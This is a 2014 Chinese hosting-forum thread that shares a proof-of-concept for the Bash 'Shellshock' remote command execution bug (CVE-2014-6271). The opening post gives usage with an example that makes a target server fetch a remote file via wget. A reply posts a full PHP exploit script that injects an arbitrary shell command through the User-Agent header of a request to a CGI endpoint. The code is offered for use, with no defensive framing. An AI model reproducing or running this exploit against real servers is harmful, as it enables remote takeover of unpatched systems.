全球主机交流论坛
标题:
BASH远程命令执行漏洞【POC】
[打印本页]
作者:
aming
时间:
2014-9-25 19:44
标题:
BASH远程命令执行漏洞【POC】
BASH远程命令执行漏洞【POC】
使用方法:
php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
例子:
php bash.php -u http://localhost/cgi-bin/hello -c "wget http://website.com-O /tmp/shit"
谁有账号?
https://www.t00ls.net/thread-27957-1-1.html
作者:
xfspace
时间:
2014-9-25 19:55
标题党啊
作者:
wmfy808
时间:
2014-9-25 20:05
到底怎么使用
作者:
卖女孩的小火柴
时间:
2014-9-25 20:08
提示:
作者被禁止或删除 内容自动屏蔽
作者:
aming
时间:
2014-9-25 20:24
卖女孩的小火柴 发表于 2014-9-25 20:08
bash.php搞一个过来
谁有账号?
https://www.t00ls.net/thread-27957-1-1.html
作者:
Polymer_dg
时间:
2014-9-25 20:50
<?php
/*
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Test CGI Code : #!/bin/bash
echo “Content-type: text/html”
echo “”
echo “Bash-is-Vulnerable”
*/
error_reporting( 0 );
if (!defined(‘STDIN’)) die( “Please run it through command-line!\n” );
$x = getopt( “u:c:” );
if (!isset($x['u']) || !isset($x['c']))
{
die( “Usage: “ .$_SERVER['PHP_SELF']. ” -u URL -c cmd\n” );
}
$url = $x['u'];
$cmd = $x['c'];
$context = stream_context_create(
array(
‘http’ => array(
‘method’ => ‘GET’,
‘header’ => ‘User-Agent: () { :;}; /bin/bash -c “‘.$cmd.’” ‘
)
)
);
if (!file_get_contents($url, false , $context) && strpos($http_response_header[ 0 ], “500″ ) > 0 )
die( “Command sent to the server!\n” );
else
die( “Connection Error\n” );
?>
欢迎光临 全球主机交流论坛 (https://lilynana.eu.org/)
Powered by Discuz! X3.4